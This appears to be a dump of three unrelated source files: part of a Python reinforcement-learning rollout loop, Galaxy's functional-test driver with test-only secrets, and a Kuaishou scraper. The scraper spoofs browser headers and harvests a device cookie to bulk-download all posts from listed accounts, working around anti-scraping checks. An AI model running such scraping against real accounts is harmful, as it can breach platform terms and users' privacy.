timestep = env.reset()
await agent.async_observe_init(timestep)
while not timestep.done:
if not self.running:
return None
action = await agent.async_act(timestep)
timestep = env.step(action)
await agent.async_observe(action, timestep)
if self.should_update:
await agent.async_update()
episode_length += 1
episode_return += timestep.reward
episode_time = time.perf_counter() - start_time
steps_per_second = episode_length / episode_time
return {
"episode_length": float(episode_length),
"episode_return": episode_return,
"episode_time/s": episode_time,
"steps_per_second": steps_per_second,
}
class ParallelLoop(Loop):
def __init__(self,
env_factory: EnvFactory,
agent_factory: AgentFactory,
controller: Union[Controller, remote.Remote],
running_phase: Phase,
should_update: bool = False,
num_rollouts: int = 1,
num_workers: Optional[int] = None,
index: int = 0,
index_offset: Optional[int] = None,
seed: Optional[int] = None) -> None:
self._running_phase = running_phase
self._should_update = should_update
self._index = index
self._num_rollouts = num_rollouts
self._num_workers = min(mp.cpu_count(), self._num_rollouts)
if num_workers is not None:
self._num_workers = min(self._num_workers, num_workers)
if index_offset is None:
self._index_offset = index * num_rollouts
else:
self._index_offset = index_offset
self._seed = seed
self._env_factory = env_factory
self._agent_factory = agent_factory
self._controller = controller
self._workloads = self._compute_workloads()
self._async_loops = []
self._processes = []
index_offset = self._index_offset
for i, workload in enumerate(self._workloads):
loop = AsyncLoop(self._env_factory, self._agent_factory,
self._controller, self.running_phase,
self.should_update, workload, i, index_offset,
self.seed)
self._async_loops.append(loop)
index_offset += workload
@property
def running_phase(self) -> Phase:
return self._running_phase
@property
def should_update(self) -> bool:
return self._should_update
@property
def num_rollouts(self) -> int:
return self._num_rollouts
@property
def num_workers(self) -> int:
return self._num_workers
@property
def index(self) -> int:
return self._index
@property
def index_offset(self) -> int:
return self._index_offset
@property
def seed(self) -> Optional[int]:
return self._seed
def run(self) -> NoReturn:
self.start()
self.join()
def start(self) -> None:
processes = []
for loop in self._async_loops:
loop.init_launching()
process = mp.Process(target=self._run_async_loop, args=(loop,))
processes.append(process)
for process in processes:
process.start()
self._processes = processes
def join(self) -> None:
for process in self._processes:
process.join()
def terminate(self) -> None:
for process in self._processes:
process.terminate()
def _compute_workloads(self) -> List[int]:
workload = self.num_rollouts // self.num_workers
r = self.num_rollouts % self.num_workers
workloads = [workload + 1] * r + [workload] * (self.num_workers - r)
return workloads
def _run_async_loop(self, loop: AsyncLoop) -> NoReturn:
if loop.seed is not None:
torch.manual_seed(loop.seed + loop.index_offset)
loop.init_execution()
loop.run()
class LoopList:
def __init__(self, loops: Optional[Sequence[Loop]] = None) -> None:
self._loops = []
if loops is not None:
self._loops.extend(loops)
@property
def loops(self) -> List[Loop]:
return self._loops
def append(self, loop: Loop) -> None:
self.loops.append(loop)
def extend(self, loops: Union[LoopList, Sequence[Loop]]) -> None:
if isinstance(loops, LoopList):
self.loops.extend(loops.loops)
else:
self.loops.extend(loops)
def start(self) -> None:
for loop in self.loops:
loop.start()
def join(self) -> None:
for loop in self.loops:
loop.join()
def terminate(self) -> None:
for loop in self.loops:
loop.terminate()
LoopLike = Union[Loop, LoopList]
|
driver_util.py
|
"""Scripts for drivers of Galaxy functional tests."""
import collections
import fcntl
import httplib
import json
import logging
import os
import random
import shutil
import socket
import struct
import sys
import tempfile
import threading
import time
import nose.config
import nose.core
import nose.loader
import nose.plugins.manager
from paste import httpserver
from functional import database_contexts
from galaxy.app import UniverseApplication as GalaxyUniverseApplication
from galaxy.util import asbool, download_to_file
from galaxy.util.properties import load_app_properties
from galaxy.web import buildapp
from galaxy.webapps.tool_shed.app import UniverseApplication as ToolshedUniverseApplication
from .api_util import get_master_api_key, get_user_api_key
from .instrument import StructuredTestDataPlugin
from .nose_util import run
from .test_logging import logging_config_file
from .tool_shed_util import parse_tool_panel_config
galaxy_root = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, os.path.pardir))
DEFAULT_WEB_HOST = "localhost"
GALAXY_TEST_DIRECTORY = os.path.join(galaxy_root, "test")
GALAXY_TEST_FILE_DIR = "test-data,https://github.com/galaxyproject/galaxy-test-data.git"
TOOL_SHED_TEST_DATA = os.path.join(GALAXY_TEST_DIRECTORY, "shed_functional", "test_data")
FRAMEWORK_TOOLS_DIR = os.path.join(GALAXY_TEST_DIRECTORY, "functional", "tools")
FRAMEWORK_UPLOAD_TOOL_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "upload_tool_conf.xml")
FRAMEWORK_SAMPLE_TOOLS_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "samples_tool_conf.xml")
FRAMEWORK_DATATYPES_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "sample_datatypes_conf.xml")
MIGRATED_TOOL_PANEL_CONFIG = 'config/migrated_tools_conf.xml'
INSTALLED_TOOL_PANEL_CONFIGS = [
os.environ.get('GALAXY_TEST_SHED_TOOL_CONF', 'config/shed_tool_conf.xml')
]
DEFAULT_LOCALES = "en"
log = logging.getLogger("test_driver")
def setup_tool_shed_tmp_dir():
tool_shed_test_tmp_dir = os.environ.get('TOOL_SHED_TEST_TMP_DIR', None)
if tool_shed_test_tmp_dir is None:
tool_shed_test_tmp_dir = tempfile.mkdtemp()
# Here's the directory where everything happens. Temporary directories are created within this directory to contain
# the hgweb.config file, the database, new repositories, etc. Since the tool shed browses repository contents via HTTP,
# the full path to the temporary directroy wher eht repositories are located cannot contain invalid url characters.
os.environ[ 'TOOL_SHED_TEST_TMP_DIR' ] = tool_shed_test_tmp_dir
return tool_shed_test_tmp_dir
def get_galaxy_test_tmp_dir():
"""Create test directory for use by Galaxy server being setup for testing."""
galaxy_test_tmp_dir = os.environ.get('GALAXY_TEST_TMP_DIR', None)
if galaxy_test_tmp_dir is None:
galaxy_test_tmp_dir = tempfile.mkdtemp()
return galaxy_test_tmp_dir
def configure_environment():
"""Hack up environment for test cases."""
# no op remove if unused
if 'HTTP_ACCEPT_LANGUAGE' not in os.environ:
os.environ[ 'HTTP_ACCEPT_LANGUAGE' ] = DEFAULT_LOCALES
# Used by get_filename in tool shed's twilltestcase.
if "TOOL_SHED_TEST_FILE_DIR" not in os.environ:
os.environ["TOOL_SHED_TEST_FILE_DIR"] = TOOL_SHED_TEST_DATA
os.environ["GALAXY_TEST_ENVIRONMENT_CONFIGURED"] = "1"
def build_logger():
"""Build a logger for test driver script."""
return log
def ensure_test_file_dir_set():
"""Ensure GALAXY_TEST_FILE_DIR setup in environment for test data resolver.
Return first directory for backward compat.
"""
galaxy_test_file_dir = os.environ.get('GALAXY_TEST_FILE_DIR', GALAXY_TEST_FILE_DIR)
os.environ['GALAXY_TEST_FILE_DIR'] = galaxy_test_file_dir
first_test_file_dir = galaxy_test_file_dir.split(",")[0]
return first_test_file_dir
def setup_galaxy_config(
tmpdir,
use_test_file_dir=False,
default_install_db_merged=True,
default_tool_data_table_config_path=None,
default_shed_tool_data_table_config=None,
default_job_config_file=None,
enable_tool_shed_check=False,
default_tool_conf=None,
shed_tool_conf=None,
datatypes_conf=None,
update_integrated_tool_panel=False,
):
"""Setup environment and build config for test Galaxy instance."""
if not os.path.exists(tmpdir):
os.makedirs(tmpdir)
file_path = os.path.join(tmpdir, 'files')
template_cache_path = tempfile.mkdtemp(prefix='compiled_templates_', dir=tmpdir)
new_file_path = tempfile.mkdtemp(prefix='new_files_path_', dir=tmpdir )
job_working_directory = tempfile.mkdtemp(prefix='job_working_directory_', dir=tmpdir)
if use_test_file_dir:
first_test_file_dir = ensure_test_file_dir_set()
if not os.path.isabs(first_test_file_dir):
first_test_file_dir = os.path.join(galaxy_root, first_test_file_dir)
library_import_dir = first_test_file_dir
import_dir = os.path.join(first_test_file_dir, 'users')
if os.path.exists(import_dir):
user_library_import_dir = import_dir
else:
user_library_import_dir = None
else:
user_library_import_dir = None
library_import_dir = None
job_config_file = os.environ.get('GALAXY_TEST_JOB_CONFIG_FILE', default_job_config_file)
tool_path = os.environ.get('GALAXY_TEST_TOOL_PATH', 'tools')
tool_dependency_dir = os.environ.get('GALAXY_TOOL_DEPENDENCY_DIR', None)
if tool_dependency_dir is None:
tool_dependency_dir = tempfile.mkdtemp(dir=tmpdir, prefix="tool_dependencies")
tool_data_table_config_path = _tool_data_table_config_path(default_tool_data_table_config_path)
default_data_manager_config = 'config/data_manager_conf.xml.sample'
for data_manager_config in ['config/data_manager_conf.xml', 'data_manager_conf.xml' ]:
if os.path.exists( data_manager_config ):
default_data_manager_config = data_manager_config
data_manager_config_file = "%s,test/functional/tools/sample_data_manager_conf.xml" % default_data_manager_config
master_api_key = get_master_api_key()
# Data Manager testing temp path
# For storing Data Manager outputs and .loc files so that real ones don't get clobbered
galaxy_data_manager_data_path = tempfile.mkdtemp(prefix='data_manager_tool-data', dir=tmpdir)
tool_conf = os.environ.get('GALAXY_TEST_TOOL_CONF', default_tool_conf)
if tool_conf is None:
# As a fallback always at least allow upload.
tool_conf = FRAMEWORK_UPLOAD_TOOL_CONF
if shed_tool_conf is not None:
tool_conf = "%s,%s" % (tool_conf, shed_tool_conf)
shed_tool_data_table_config = default_shed_tool_data_table_config
if shed_tool_data_table_config is None:
shed_tool_data_table_config = 'config/shed_tool_data_table_conf.xml'
config = dict(
admin_users='test@bx.psu.edu',
allow_library_path_paste=True,
allow_user_creation=True,
allow_user_deletion=True,
api_allow_run_as='test@bx.psu.edu',
auto_configure_logging=logging_config_file is None,
check_migrate_tools=False,
cleanup_job='onsuccess',
data_manager_config_file=data_manager_config_file,
enable_beta_tool_formats=True,
file_path=file_path,
galaxy_data_manager_data_path=galaxy_data_manager_data_path,
id_secret='changethisinproductiontoo',
job_config_file=job_config_file,
job_queue_workers=5,
job_working_directory=job_working_directory,
library_import_dir=library_import_dir,
log_destination="stdout",
new_file_path=new_file_path,
master_api_key=master_api_key,
running_functional_tests=True,
shed_tool_data_table_config=shed_tool_data_table_config,
template_cache_path=template_cache_path,
template_path='templates',
tool_config_file=tool_conf,
tool_data_table_config_path=tool_data_table_config_path,
tool_parse_help=False,
tool_path=tool_path,
update_integrated_tool_panel=update_integrated_tool_panel,
use_tasked_jobs=True,
use_heartbeat=False,
user_library_import_dir=user_library_import_dir,
)
config.update(database_conf(tmpdir))
config.update(install_database_conf(tmpdir, default_merged=default_install_db_merged))
if datatypes_conf is not None:
config['datatypes_config_file'] = datatypes_conf
if enable_tool_shed_check:
config["enable_tool_shed_check"] = enable_tool_shed_check
config["hours_between_check"] = 0.001
if tool_dependency_dir:
config["tool_dependency_dir"] = tool_dependency_dir
# Used by shed's twill dependency stuff - todo read from
# Galaxy's config API.
os.environ["GALAXY_TEST_TOOL_DEPENDENCY_DIR"] = tool_dependency_dir
return config
def _tool_data_table_config_path(default_tool_data_table_config_path=None):
tool_data_table_config_path = os.environ.get('GALAXY_TEST_TOOL_DATA_TABLE_CONF', default_tool_data_table_config_path)
if tool_data_table_config_path is None:
# ... otherise find whatever Galaxy would use as the default and
# the sample data for fucntional tests to that.
default_tool_data_config = 'config/tool_data_table_conf.xml.sample'
for tool_data_config in ['config/tool_data_table_conf.xml', 'tool_data_table_conf.xml' ]:
if os.path.exists( tool_data_config ):
default_tool_data_config = tool_data_config
tool_data_table_config_path = '%s,test/functional/tool-data/sample_tool_data_tables.xml' % default_tool_data_config
return tool_data_table_config_path
def nose_config_and_run( argv=None, env=None, ignore_files=[], plugins=None ):
"""Setup a nose context and run tests.
Tests are specified by argv (defaulting to sys.argv).
"""
if env is None:
env = os.environ
if plugins is None:
plugins = nose.plugins.manager.DefaultPluginManager()
if argv is None:
argv = sys.argv
test_config = nose.config.Config(
env=os.environ,
ignoreFiles=ignore_files,
plugins=plugins,
)
# Add custom plugin to produce JSON data used by planemo.
test_config.plugins.addPlugin( StructuredTestDataPlugin() )
test_config.configure( argv )
result = run( test_config )
success = result.wasSuccessful()
return success
def copy_database_template( source, db_path ):
"""Copy a 'clean' sqlite template database.
From file or URL to specified path for sqlite database.
"""
db_path_dir = os.path.dirname(db_path)
if not os.path.exists(db_path_dir):
os.makedirs(db_path_dir)
if os.path.exists(source):
shutil.copy(source, db_path)
assert os.path.exists(db_path)
elif source.lower().startswith(("http://", "https://", "ftp://")):
download_to_file(source, db_path)
else:
raise Exception( "Failed to copy database template from source %s" % source )
def database_conf(db_path, prefix="GALAXY"):
"""Find (and populate if needed) Galaxy database connection."""
database_auto_migrate = False
dburi_var = "%s_TEST_DBURI" % prefix
if dburi_var in os.environ:
database_connection = os.environ[dburi_var]
else:
default_db_filename = "%s.sqlite" % prefix.lower()
template_var = "%s_TEST_DB_TEMPLATE" % prefix
db_path = os.path.join(db_path, default_db_filename)
if template_var in os.environ:
# Middle ground between recreating a completely new
# database and pointing at existing database with
# GALAXY_TEST_DBURI. The former requires a lot of setup
# time, the latter results in test failures in certain
# cases (namely tool shed tests expecting clean database).
copy_database_template(os.environ[template_var], db_path)
database_auto_migrate = True
database_connection = 'sqlite:///%s' % db_path
config = {
"database_connection": database_connection,
"database_auto_migrate": database_auto_migrate
}
if not database_connection.startswith("sqlite://"):
config["database_engine_option_max_overflow"] = "20"
config["database_engine_option_pool_size"] = "10"
return config
def install_database_conf(db_path, default_merged=False):
if 'GALAXY_TEST_INSTALL_DBURI' in os.environ:
install_galaxy_database_connection = os.environ['GALAXY_TEST_INSTALL_DBURI']
elif asbool(os.environ.get('GALAXY_TEST_INSTALL_DB_MERGED', default_merged)):
install_galaxy_database_connection = None
else:
install_galaxy_db_path = os.path.join(db_path, 'install.sqlite')
install_galaxy_database_connection = 'sqlite:///%s' % install_galaxy_db_path
conf = {}
if install_galaxy_database_connection is not None:
conf["install_database_connection"] = install_galaxy_database_connection
return conf
def database_files_path(test_tmpdir, prefix="GALAXY"):
"""Create a mock database/ directory like in GALAXY_ROOT.
Use prefix to default this if TOOL_SHED_TEST_DBPATH or
GALAXY_TEST_DBPATH is set in the environment.
"""
environ_var = "%s_TEST_DBPATH" % prefix
if environ_var in os.environ:
db_path = os.environ[environ_var]
else:
tempdir = tempfile.mkdtemp(dir=test_tmpdir)
db_path = os.path.join(tempdir, 'database')
return db_path
def _get_static_settings():
"""Configuration required for Galaxy static middleware.
Returns dictionary of the settings necessary for a galaxy App
to be wrapped in the static middleware.
This mainly consists of the filesystem locations of url-mapped
static resources.
"""
static_dir = os.path.join(galaxy_root, "static")
# TODO: these should be copied from config/galaxy.ini
return dict(
static_enabled=True,
static_cache_time=360,
static_dir=static_dir,
static_images_dir=os.path.join(static_dir, 'images', ''),
static_favicon_dir=os.path.join(static_dir, 'favicon.ico'),
static_scripts_dir=os.path.join(static_dir, 'scripts', ''),
static_style_dir=os.path.join(static_dir, 'june_2007_style', 'blue'),
static_robots_txt=os.path.join(static_dir, 'robots.txt'),
)
def get_webapp_global_conf():
"""Get the global_conf dictionary sent to ``app_factory``."""
# (was originally sent 'dict()') - nothing here for now except static settings
global_conf = dict()
global_conf.update( _get_static_settings() )
return global_conf
def wait_for_http_server(host, port):
"""Wait for an HTTP server to boot up."""
# Test if the server is up
for i in range( 10 ):
# directly test the app, not the proxy
conn = httplib.HTTPConnection(host, port)
conn.request( "GET", "/" )
if conn.getresponse().status == 200:
break
time.sleep( 0.1 )
else:
template = "Test HTTP server on host %s and port %s did not return '200 OK' after 10 tries"
message = template % (host, port)
raise Exception(message)
def serve_webapp(webapp, port=None, host=None):
"""Serve the webapp on a recommend port or a free one.
Return the port the webapp is running one.
"""
server = None
if port is not None:
server = httpserver.serve( webapp, host=host, port=port, start_loop=False )
else:
random.seed()
for i in range( 0, 9 ):
try:
port = str( random.randint( 8000, 10000 ) )
server = httpserver.serve( webapp, host=host, port=port, start_loop=False )
break
except socket.error as e:
if e[0] == 98:
continue
raise
else:
raise Exception( "Unable to open a port between %s and %s to start Galaxy server" % ( 8000, 1000 ) )
t = threading.Thread( target=server.serve_forever )
t.start()
return server, port
def cleanup_directory(tempdir):
"""Clean up temporary files used by test unless GALAXY_TEST_NO_CLEANUP is set.
Also respect TOOL_SHED_TEST_NO_CLEANUP for legacy reasons.
"""
skip_cleanup = "GALAXY_TEST_NO_CLEANUP" in os.environ or "TOOL_SHED_TEST_NO_CLEANUP" in os.environ
if skip_cleanup:
log.info( "GALAXY_TEST_NO_CLEANUP is on. Temporary files in %s" % tempdir )
return
try:
if os.path.exists(tempdir) and skip_cleanup:
shutil.rmtree(tempdir)
except Exception:
pass
def setup_shed_tools_for_test(app, tmpdir, testing_migrated_tools, testing_installed_tools):
"""Modify Galaxy app's toolbox for migrated or installed tool tests."""
# Store a jsonified dictionary of tool_id : GALAXY_TEST_FILE_DIR pairs.
galaxy_tool_shed_test_file = os.path.join(tmpdir, 'shed_tools_dict')
shed_tools_dict = {}
if testing_migrated_tools:
has_test_data, shed_tools_dict = parse_tool_panel_config(MIGRATED_TOOL_PANEL_CONFIG, shed_tools_dict)
elif testing_installed_tools:
for shed_tool_config in INSTALLED_TOOL_PANEL_CONFIGS:
has_test_data, shed_tools_dict = parse_tool_panel_config(shed_tool_config, shed_tools_dict)
# Persist the shed_tools_dict to the galaxy_tool_shed_test_file.
with open(galaxy_tool_shed_test_file, 'w') as shed_tools_file:
shed_tools_file.write(json.dumps(shed_tools_dict))
if not os.path.isabs(galaxy_tool_shed_test_file):
galaxy_tool_shed_test_file = os.path.join(galaxy_root, galaxy_tool_shed_test_file)
os.environ['GALAXY_TOOL_SHED_TEST_FILE'] = galaxy_tool_shed_test_file
if testing_installed_tools:
# TODO: Do this without modifying app - that is a pretty violation
# of Galaxy's abstraction - we shouldn't require app at all let alone
# be modifying it.
tool_configs = app.config.tool_configs
# Eliminate the migrated_tool_panel_config from the app's tool_configs, append the list of installed_tool_panel_configs,
# and reload the app's toolbox.
relative_migrated_tool_panel_config = os.path.join(app.config.root, MIGRATED_TOOL_PANEL_CONFIG)
if relative_migrated_tool_panel_config in tool_configs:
tool_configs.remove(relative_migrated_tool_panel_config)
for installed_tool_panel_config in INSTALLED_TOOL_PANEL_CONFIGS:
tool_configs.append(installed_tool_panel_config)
from galaxy import tools # delay import because this brings in so many modules for small tests # noqa: E402
app.toolbox = tools.ToolBox(tool_configs, app.config.tool_path, app)
def build_galaxy_app(simple_kwargs):
"""Build a Galaxy app object from a simple keyword arguments.
Construct paste style complex dictionary and use load_app_properties so
Galaxy override variables are respected. Also setup "global" references
to sqlalchemy database context for Galaxy and install databases.
"""
log.info("Galaxy database connection: %s", simple_kwargs["database_connection"])
simple_kwargs['global_conf'] = get_webapp_global_conf()
simple_kwargs['global_conf']['__file__'] = "config/galaxy.ini.sample"
simple_kwargs = load_app_properties(
kwds=simple_kwargs
)
# Build the Universe Application
app = GalaxyUniverseApplication( **simple_kwargs )
log.info( "Embedded Galaxy application started" )
database_contexts.galaxy_context = app.model.context
database_contexts.install_context = app.install_model.context
return app
def build_shed_app(simple_kwargs):
"""Build a Galaxy app object from a simple keyword arguments.
Construct paste style complex dictionary. Also setup "global" reference
to sqlalchemy database context for tool shed database.
"""
log.info("Tool shed database connection: %s", simple_kwargs["database_connection"])
# TODO: Simplify global_conf to match Galaxy above...
simple_kwargs['__file__'] = 'tool_shed_wsgi.ini.sample'
simple_kwargs['global_conf'] = get_webapp_global_conf()
app = ToolshedUniverseApplication( **simple_kwargs )
database_contexts.tool_shed_context = app.model.context
log.info( "Embedded Toolshed application started" )
return app
ServerWrapper = collections.namedtuple('ServerWrapper', ['app', 'server', 'name', 'host', 'port'])
def _stop(self):
if self.server is not None:
log.info("Shutting down embedded %s web server" % self.name)
self.server.server_close()
log.info("Embedded web server %s stopped" % self.name)
if self.app is not None:
log.info("Stopping application %s" % self.name)
self.app.shutdown()
log.info("Application %s stopped." % self.name)
ServerWrapper.stop = _stop
class classproperty(object):
def __init__(self, f):
self.f = f
def __get__(self, obj, owner):
return self.f(owner)
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
def launch_server(app, webapp_factory, kwargs, prefix="GALAXY", config_object=None):
"""Launch a web server for a given app using supplied factory.
Consistently read either GALAXY_TEST_HOST and GALAXY_TEST_PORT or
TOOL_SHED_TEST_HOST and TOOL_SHED_TEST_PORT and ensure these are
all set after this method has been called.
"""
name = prefix.lower()
host_env_key = "%s_TEST_HOST" % prefix
port_env_key = "%s_TEST_PORT" % prefix
default_web_host = getattr(config_object, "default_web_host", DEFAULT_WEB_HOST)
host = os.environ.get(host_env_key, default_web_host)
port = os.environ.get(port_env_key, None)
webapp = webapp_factory(
kwargs[ 'global_conf' ],
app=app,
use_translogger=False,
static_enabled=True
)
server, port = serve_webapp(
webapp,
host=host, port=port
)
os.environ[host_env_key] = host
os.environ[port_env_key] = port
wait_for_http_server(host, port)
log.info("Embedded web server for %s started" % name)
return ServerWrapper(
app, server, name, host, port
)
class TestDriver(object):
"""Responsible for the life-cycle of a Galaxy-style functional test.
Sets up servers, configures tests, runs nose, and tears things
down. This is somewhat like a Python TestCase - but different
because it is meant to provide a main() endpoint.
"""
def __init__(self):
"""Setup tracked resources."""
self.server_wrappers = []
self.temp_directories = []
def setup(self):
"""Called before tests are built."""
def build_tests(self):
"""After environment is setup, setup nose tests."""
def tear_down(self):
"""Cleanup resources tracked by this object."""
for server_wrapper in self.server_wrappers:
server_wrapper.stop()
for temp_directory in self.temp_directories:
cleanup_directory(temp_directory)
def run(self):
"""Driver whole test.
Setup environment, build tests (if needed), run test,
and finally cleanup resources.
"""
configure_environment()
self.setup()
self.build_tests()
try:
success = nose_config_and_run()
return 0 if success else 1
except Exception as e:
log.info("Failure running tests")
raise e
finally:
log.info( "Shutting down")
self.tear_down()
class GalaxyTestDriver(TestDriver):
"""Instantial a Galaxy-style nose TestDriver for testing Galaxy."""
testing_shed_tools = False
def setup(self, config_object=None):
"""Setup a Galaxy server for functional test (if needed).
Configuration options can be specified as attributes on the supplied
```config_object``` (defaults to self).
"""
if config_object is None:
config_object = self
self.external_galaxy = os.environ.get('GALAXY_TEST_EXTERNAL', None)
self.galaxy_test_tmp_dir = get_galaxy_test_tmp_dir()
self.temp_directories.append(self.galaxy_test_tmp_dir)
testing_shed_tools = getattr(config_object, "testing_shed_tools", False)
if getattr(config_object, "framework_tool_and_types", False):
default_tool_conf = FRAMEWORK_SAMPLE_TOOLS_CONF
datatypes_conf_override = FRAMEWORK_DATATYPES_CONF
else:
default_tool_conf = getattr(config_object, "default_tool_conf", None)
datatypes_conf_override = getattr(config_object, "datatypes_conf_override", None)
if self.external_galaxy is None:
tempdir = tempfile.mkdtemp(dir=self.galaxy_test_tmp_dir)
# Configure the database path.
galaxy_db_path = database_files_path(tempdir)
# Allow config object to specify a config dict or a method to produce
# one - other just read the properties above and use the default
# implementation from this file.
galaxy_config = getattr(config_object, "galaxy_config", None)
if hasattr(galaxy_config, '__call__'):
galaxy_config = galaxy_config()
if galaxy_config is None:
setup_galaxy_config_kwds = dict(
use_test_file_dir=not testing_shed_tools,
default_install_db_merged=True,
default_tool_conf=default_tool_conf,
datatypes_conf=datatypes_conf_override,
)
galaxy_config = setup_galaxy_config(
galaxy_db_path,
**setup_galaxy_config_kwds
)
handle_galaxy_config_kwds = getattr(
config_object, "handle_galaxy_config_kwds", None
)
if handle_galaxy_config_kwds is not None:
handle_galaxy_config_kwds(galaxy_config)
# ---- Build Application --------------------------------------------------
self.app = build_galaxy_app(galaxy_config)
server_wrapper = launch_server(
self.app,
buildapp.app_factory,
galaxy_config,
config_object=config_object,
)
self.server_wrappers.append(server_wrapper)
log.info("Functional tests will be run against external Galaxy server %s:%s" % (server_wrapper.host, server_wrapper.port))
else:
log.info("Functional tests will be run against test managed Galaxy server %s" % self.external_galaxy)
# Ensure test file directory setup even though galaxy config isn't built.
ensure_test_file_dir_set()
def setup_shed_tools(self, testing_migrated_tools=False, testing_installed_tools=True):
setup_shed_tools_for_test(
self.app,
self.galaxy_test_tmp_dir,
testing_migrated_tools,
testing_installed_tools
)
def build_tool_tests(self, testing_shed_tools=None):
if self.app is None:
return
if testing_shed_tools is None:
testing_shed_tools = getattr(self, "testing_shed_tools", False)
# We must make sure that functional.test_toolbox is always imported after
# database_contexts.galaxy_content is set (which occurs in this method above).
# If functional.test_toolbox is imported before database_contexts.galaxy_content
# is set, sa_session will be None in all methods that use it.
import functional.test_toolbox
functional.test_toolbox.toolbox = self.app.toolbox
# When testing data managers, do not test toolbox.
functional.test_toolbox.build_tests(
app=self.app,
testing_shed_tools=testing_shed_tools,
master_api_key=get_master_api_key(),
user_api_key=get_user_api_key(),
)
return functional.test_toolbox
def run_tool_test(self, tool_id, index=0):
import functional.test_toolbox
functional.test_toolbox.toolbox = self.app.toolbox
tool = self.app.toolbox.get_tool(tool_id)
testdef = tool.tests[index]
test_case_cls = functional.test_toolbox.ToolTestCase
test_case = test_case_cls(methodName="setUp") # NO-OP
test_case.shed_tool_id = None
test_case.master_api_key = get_master_api_key()
test_case.user_api_key = get_user_api_key()
test_case.setUp()
test_case.do_it(testdef)
def drive_test(test_driver_class):
"""Instantiate driver class, run, and exit appropriately."""
test_driver = test_driver_class()
sys.exit(test_driver.run())
__all__ = (
"copy_database_template",
"build_logger",
"drive_test",
"FRAMEWORK_UPLOAD_TOOL_CONF",
"FRAMEWORK_SAMPLE_TOOLS_CONF",
"FRAMEWORK_DATATYPES_CONF",
"database_conf",
"get_webapp_global_conf",
"nose_config_and_run",
"setup_galaxy_config",
"TestDriver",
"wait_for_http_server",
)
|
kuaishou_new.py
|
# -*-coding:utf-8 -*-
import requests
import time
import os
import json
import threading
import re
cookies = ""
def downVideo(video,d_url,v_name):
if not os.path.exists(video):
r = requests.get(d_url)
r.raise_for_status()
with open(video, "wb") as f:
f.write(r.content)
print(" 视频 " + v_name + " 下载成功 √")
# else:
# print(" 视频 " + v_name + " 已存在 √")
def downPic(j,pic,d_url,p_name):
if not os.path.exists(pic):
r = requests.get(d_url)
r.raise_for_status()
with open(pic, "wb") as f:
f.write(r.content)
print(" " + str(j + 1) + "/ 图片 " + p_name + " 下载成功 √")
# else:
# print(" " + str(j + 1) + "/ 图片 " + p_name + " 已存在 √")
def getCookies():
# url = 'https://c.m.chenzhongtech.com/rest/lapi/getcoo?_='+str(int(round(time.time() * 1000)))
url = 'https://live.kuaishou.com/u/3xnvh7hzw7ib9ec/3xqbgg5rrpui69c'
headers_web = {
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',
'Connection': 'keep-alive',
'Host': 'live.kuaishou.com',
# 'Origin': 'https://v.kuaishou.com',
# 'Referer': 'https://v.kuaishou.com/fw/photo/3xqbgg5rrpui69c',
'Sec-Fetch-Dest': 'document',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-Site': 'none',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36',
# 'Cookie':'did=web_c78c7a3f39befb6076e5891268254f0f'
}
rs = requests.get(url=url, headers=headers_web, allow_redirects=False)
# resJson = json.loads(rs.content.decode(encoding='utf-8'))
global cookies
# cookies = resJson['cookies'][0].split(';')[0]
cookies = 'did='+rs.cookies._cookies['.kuaishou.com']['/']['did'].value
def getVideo(data):
url = 'https://v.kuaishou.com/rest/kd/feed/profile'
headers_web = {
'accept': '*/*',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',
'Connection': 'keep-alive',
'Content-Type': 'application/json',
'Host': 'v.kuaishou.com',
'Origin': 'https://v.kuaishou.com',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Site': 'same-origin',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36',
#Cookie 根据自己的电脑修改
#'Cookie': 'did=web_6ab2aa48ebfa49c18e497b1efb80429f'
}
headers_web["Cookie"] = cookies
rs = requests.post(url=url, headers=headers_web, json=data)
v_json = json.loads(rs.content.decode(encoding='utf-8'))
if (str(v_json["result"])=="2"):
print("服务器返回操作太快,可能触发反爬机制")
return
feeds = v_json["feeds"]
for i in range(len(feeds)):
feed = feeds[i]
caption = str(feed["caption"]).replace("\n","").replace("\u200b","").replace("\"","").replace("\\","")[0:100]
f_time = time.strftime('%Y-%m-%d %H%M%S', time.localtime(feed['timestamp'] / 1000))
name = re.sub(r'[\\/:*?"<>|\r\n]+', "", feed['userName'])
dir = "data/" + name + "(" + feed['userEid'] + ")/"
if not os.path.exists(dir):
os.makedirs(dir)
if(str(feed['singlePicture']) == "False"):
d_url = feed['mainMvUrls'][0]['url']
v_name = f_time + "_" + caption + ".mp4"
video = dir + v_name
t_downVideo = threading.Thread(target=downVideo, args=(video,d_url,v_name,))
t_downVideo.start()
else:
try:
imgList = feed['ext_params']['atlas']['list']
cdn = feed['ext_params']['atlas']['cdn'][0]
except:
imgList = []
imgList.append(str(feed['coverUrls'][0]['url']).replace("https://",""))
cdn = ""
for j in range(len(imgList)):
p_name = f_time + "_" + caption + "_" + str(j + 1) + ".jpg"
pic = dir + p_name
d_url = "https://" + cdn + imgList[j].replace("webp","jpg")
t_downPic = threading.Thread(target=downPic, args=(j,pic,d_url,p_name,))
t_downPic.start()
pcursor = v_json["pcursor"]
if(str(pcursor) != "no_more"):
data = {"eid":v_json['feeds'][0]['userEid'],"count":30,"pcursor":pcursor}
getVideo(data)
if not os.path.exists("/data"):
os.makedirs("/data")
getCookies()
eidList = ["3xnvh7hzw7ib9ec","3xi4m53fqfftq94"]
